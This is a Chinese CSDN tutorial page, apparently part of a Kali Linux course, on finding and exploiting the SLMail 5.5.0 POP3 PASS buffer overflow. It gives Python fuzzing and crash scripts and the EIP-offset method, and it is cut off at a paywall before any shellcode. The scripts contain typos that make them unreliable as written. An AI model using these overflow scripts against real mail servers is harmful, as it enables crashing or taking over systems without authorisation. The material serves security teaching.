Kali Linux 从入门到精通(十)-漏洞挖掘之缓冲区溢出

最新推荐文章于 2025-02-27 18:18:35 发布
最新推荐文章于 2025-02-27 18:18:35 发布
阅读量2.1k 收藏 56
点赞数 3
分类专栏: ▼ 信息安全 >> Reverse Engineering >> Kali Linux 文章标签: Kali 漏洞挖掘 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33592583/article/details/85790763
版权

Kali Linux 从入门到精通(十)-漏洞挖掘之缓冲区溢出

程序漏洞从哪里来?

  • 罪恶的根源:变量
  • 数据与代码边界不清(注入攻击)
  • 最简漏洞原理-shell 脚本漏洞(本质:输入数据本身,程序本身没做检查导致)

缓冲区溢出

  • 当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被"称暴",从而覆盖了相邻内存区域的数据
  • 成功修改内存数据,可造成进程劫持,执行恶意代码,获取服务控制权等后果’

如何发现漏洞?

  • 源码审计
  • 逆向工程
  • 模糊测试
    • 向程序堆栈半随机的数据,根据内存变化判断溢出
    • 数据生成器,生成随机,半随机数据
    • 测试工具,识别溢出漏洞(动态调试工具:IDA,OD)

Windows系统缓冲区溢出

  • FUZZING(模糊测试)
    • 准备环境
      • SLMail 5.5.0 Mail Server
      • immunityDebugger_1_85_setup.exe
      • mona.py
    • POP3 PASS 命令存在缓冲区溢出漏洞
    • 无需身份验证实现远程代码执行
    • windows防护机制
      • DEP:阻止代码从数据页被执行(软硬件实现)
      • ASLR:随机内存地址加载执行程序和DLL,每次重启地址变化
  • POP3
    • NC 110 端口
    • 了解未知协议
      • Wireshark
      • RFC
    • 01.py
     #!/bin/python
 import socket
 s=socket(socket.AF_INET,socket.SOCK_STREM)
 try:
      print "\nSending evil buffer..."
      s.connect(('1.1.1.1',110))
      data=s.recv(1024)
      print data

      s.send('USER xxx'+'\r\n')
      data=s.recv(1024)
      print data
      
      s.send('PASS test\r\n')
      data=s.recv(1024)
      print data

      s.close()
      print "\nDone!"
except:
      print "Could not connext to POP3!"
  • FUZZING(way 1)
    • 测试PASS 命令收到大量数据时是否发生溢出
    • EIP寄存器存放下一条指令的地址
    • 02.py
       #!/usr/bin/python
   import socket 
   buffer=["A"]
   counter=100
   while len(buffer)<=50:
       buffer.append("A"*counter)
       counter=counter+200
   for string in buffer:
       print "Fuzzing PASS with %s bytes" % len(string)
       s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
       connect=s.connect(('1.1.1.1.1',110))
       s.recv(1024)
       s.send('USER test'+'\r\n')
       s.recv(1024)
       s.send('PASS'+string+'\r\n')
       s.send('QUIT\r\n')
       s.close()
  • FUZZING(way 2)
    • 2700个字符实现EIP溢出
    • 03.py
     import socket 
 s=soket.socket(socket.AF_INET,socket.SOCK_STREAM)
 buffer='A'*2600(不断改变数字)
 try:
    print "\nSending evil buffer..."
    s.connect(('1.1.1.1',110))
    data=s.recv(1024)
    s.send('PASS'+buffer+'\r\n')
    print '\nDone!'
 except:
    print "Could not connect to POP3!"
    • 找到精确溢出的4个字节
      • 二分法(2700->2600->2650)
      • 唯一字串法
        • kali生成唯一字符串:/sur/share/metasploit/tools/pattern_ create.rb 2700
      • 04.py
      • 05.py
    • 思路: 将EIP修改为shellcode代码的内存地址,将shellcode写入到该地址空间,程序读取EIP寄存器数值,并跳转到shellcode代码段执行
    • 寻找可存放的内存地址空间
    • 06.py
     #!/usr/bin/python
 import socket
 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 buffer="A"*2606+"B"*4+C*(3500-2606-4)  # 假设EXP寄存器最大可存放3500个字符
 try:
    print "\nSending ing evi
最低0.47元/天 解锁文章
Kali Linux入门精通()-安装
https://github.com/Wheeeeeeeeels
01-02 9260
Kali Linux入门精通()-安装 Kail Linux 安装 持久加密USB安装-1 LUSK:Linux Unified Key Setup 磁盘分区加密规范 不依赖与操作系统的磁盘级加密 Window-------DoxBox 后端: dm-crypt 前端: crtptsetup 微软的bitlocker 将镜像刻录到U盘 dd if=kali-linux-ve...
Kali Linux入门精通()-漏洞扫描
https://github.com/Wheeeeeeeeels
01-03 2481
Kali Linux入门精通()-弱点扫描 发现弱点 发现漏洞 基于端口服务扫描结果版本信息(速度慢) 搜索已公开的漏洞数据库(数量大) 使用弱点扫描器实现漏洞管理 从信息的维度定义漏洞管理 信息收集 扫描发现网络IP,OS,服务,配置,楼栋号 能力需求:定义扫描方式内容和目标 信息管理 格式化信息,并进行筛选,分组,定义优先级 能力需求:资产分组,指定所有者,...
【黑客必看】kali Linux安装教程(超详细),看这一篇就够了
最新发布
wangluoanquan111的博客
02-27 4756
官网镜像链接:https://cdimage.kali.org/kali-2023.4/kali-linux-2023.4-vmware-amd64.7z镜像站链接:阿里巴巴开源镜像站-OPSX镜像站-阿里云开发者社区 (aliyun.com)清华大学开源软件镜像站 | Tsinghua Open Source Mirror。
Kali Linux入门精通()-概论
热门推荐
https://github.com/Wheeeeeeeeels
01-02 4万+
Kali Linux入门精通()-概论 基本介绍 1.安全目标 先于攻击者发现和防止漏洞出现 攻击型安全 防护型安全 2.渗透测试 尝试挫败安全防御机制,发现系统安全弱点 从攻击者的角度思考,测量安全防护有效性 证明安全问题的存在,而非破坏 道德约束 法律 3.渗透测试标准(The Penetration Testing Execution Standard)...
kali渗透测试缓冲区溢出
02-09
KALI渗透测试之缓冲区溢出篇章,详细介绍kali缓冲区溢出工具使用。
Kali Linux入门精通()-主动信息收集
https://github.com/Wheeeeeeeeels
01-02 1482
Kali Linux入门精通()-主动信息收集 基本介绍 直接与目标系统交互通信 无法避免留下访问的痕迹 使用受控的第三方电脑进行探测 使用代理或已经被控制的主机 做好被封杀的准本 使用噪声迷惑目标,淹没真实的探测流量 扫描 发送不同的探测,根据返回结果判断目标状态 发现 识别活着的主机 潜在的被攻击目标 输出一个IP地址列表 2,3,4层发现 二层发现...
【今天黑一下学校教务系统】某学校渗透测试远程命令执行(已授权)
shandongjiushen的博客
02-07 3896
我和小伙伴们都惊呆了
Kali Linux零基础入门精通
libaiup的博客
06-16 304
*作为一名从事渗透测试的人员,不懂Kali Linux的话,就out了。**它他预装了数百种享誉盛名的渗透工具,使你可以更轻松地测试、破解以及进行与数字取证相关的任何其他工作。今天给大家分享一套Kali Linux资料合集,他包括,以及一份。内容全面丰富,特别适合渗透测试初学者学习参考。
渗透测试和linux运维,Kali Linux与Metasploit渗透测试从入门精通(完整版)
weixin_42567752的博客
05-13 763
{getUnitName}{getLessonName}敬请期待免费{getTaskName}剩余观看时长:{watchLimitRemaining}回放{activityStartTimeStr}正在直播中直播结束{activityLength}免费{getTaskName}敬请期待{"id": "78","isDefault": "0","learnMode": "lockMode","isM...
漏洞发掘 - 缓冲区溢出
weixin_43745072的博客
10-26 267
缓存区溢出/缓存区超限 :10字节的数据写入8字节的空间,覆盖掉其他的内容。可能导致程序崩溃。 movl %eax, %ebx #把32位的EAX寄存器值传送给32为的EBX寄存器值 movw %ax, %bx #把32位的EAX寄存器值传送给32为的EBX寄存器值 movb %al, %lx #把32位的EAX寄存器值传送给32为的EBX寄存器值 在运行的时候,动态获取ESP指针 #include<stdlib.h> unsigned long sp(void
Kali Linux渗透测试——缓冲区溢出
Captain_RB的博客
02-09 3264
Kali Linux渗透测试——缓冲区溢出 笔记内容参考安全牛Kali Linux渗透测试视频教程,仅供个人学习记录使用。 所有漏洞的根源均来自于数据的输入,缓冲区溢出的原理在于数据与代码边界模糊,当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被“撑暴”,从而覆盖了相邻内存区域的数据,成功修改内存数据,可造成进程劫持,执行恶意代码,获取服务器控制权等后果。 为更好理...
Kali使用全部资料
03-28
包含Kali的全套学习资料,可以帮助做渗透分析,网络安全的人提供从入门精通的全部资源!
kali linux基础配置文档 中文PDF版
03-24
kali linux基础配置文档 中文PDF版
msf渗透linux教程,Kali Linux与Metasploit渗透测试从入门精通(完整版)
weixin_35538148的博客
05-03 603
{getUnitName}{getLessonName}敬请期待免费{getTaskName}剩余观看时长:{watchLimitRemaining}回放{activityStartTimeStr}正在直播中直播结束{activityLength}免费{getTaskName}敬请期待{"id": "118","isDefault": "0","learnMode": "lockMode","is...
kali实战-缓冲区溢出
weixin_33675507的博客
05-27 485
我们之前可能都了解过自动化的程序,学习自动化程序的使用方法,但是在计算机领域有一个词语叫做“零日漏洞”,这样的漏洞是如何发现的呢?有些漏洞通过远程就可以控制你的计算机,安装***,达到这样的目的,他们是如何通过远程控制你的系统的呢?今天我们学习此类***中最主要一种:缓冲区溢出,通过缓冲区溢出我们就可以控制目标机器。基于本章的内容从原理上我们已经具备这样的方法可以自己去发现“...
Kali Linux学习之缓冲区溢出
qq_45118881的博客
09-06 441
缓冲区溢出 模糊测试 汇编指令转二进制(kali操作) 老师操作: cd /usr/share/metasploit-framework/tools/ ./nasm_shell.rb 现在版本kali: root@kaliwang:/usr/share/metasploit-framework/tools# cd exploit/ root@kaliwang:/usr/share/metasploit-framework/tools/exploit# ./nasm_shell.rb 渗透步骤 利用缓冲区
KaLi入门基础
开摆工作室(kbai.cc)
08-24 3万+
我的博客链接:https://blog.kbai.cc/ 学习KaLi ​ ????郑重声明 此文章可能会包含敏感以及危险的命令❗❗❗命令有风险,回车需谨慎。 此文章仅供学习交流与参考使用,禁止运用于任何非法行动或测试中,若有预期之外的后果,将不承担任何责任!! ❌ERHE再次进行警告与提醒! ┌──( root????KaLi-Erhe )-[ ~ ] └─# cat 重要的事情说三遍 ❗❗❗ ⭕命令有风险,回车需谨慎 ❗ ⭕命令有风险,回车需谨慎
Kali Linux入门教程(非常详细)从零基础入门精通,看完这一篇就够了。
leah126的博客
05-10 483
作为一名从事渗透测试的人员,不懂Kali Linux的话,就out了。它预装了数百种享誉盛名的渗透工具,使你可以更轻松地测试、破解以及进行与数字取证相关的任何其他工作。今天给大家分享一套Kali Linux资料合集,包括12份Kali Linux渗透测试PDF资料,内容全面丰富,特别适合渗透测试初学者、想入行安全的朋友学习参考,建议大家人手一份。​。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值